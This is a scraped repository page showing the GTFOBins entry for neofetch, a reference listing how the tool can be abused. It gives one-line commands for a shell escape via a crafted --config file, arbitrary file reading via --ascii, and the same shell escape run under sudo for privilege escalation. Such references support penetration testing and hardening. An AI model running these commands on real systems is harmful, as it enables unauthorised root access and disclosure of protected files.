This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-04 02:38:43 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
87270f9b55b032da830badd5eafe1e665e0bc0a5
GTFOBins.github.io
/
_gtfobins
/
neofetch.md
ymka-shelter
720cc73c7e
Add neofetch shell
...
Co-authored-by: Andrea Cardaci <
cyrus.and@gmail.com
>
2022-05-09 14:41:13 +02:00
496 B
Raw
Blame
History
functions
functions
shell
file-read
sudo
code
TF=$(mktemp) echo 'exec /bin/sh' >$TF neofetch --config $TF
description
code
The file content is used as the logo while some other information is displayed on its right, thus it might not be suitable to read arbitray binary files.
LFILE=file_to_read neofetch --ascii $LFILE
code
TF=$(mktemp) echo 'exec /bin/sh' >$TF sudo neofetch --config $TF
Reference in New Issue
View Git Blame
Copy Permalink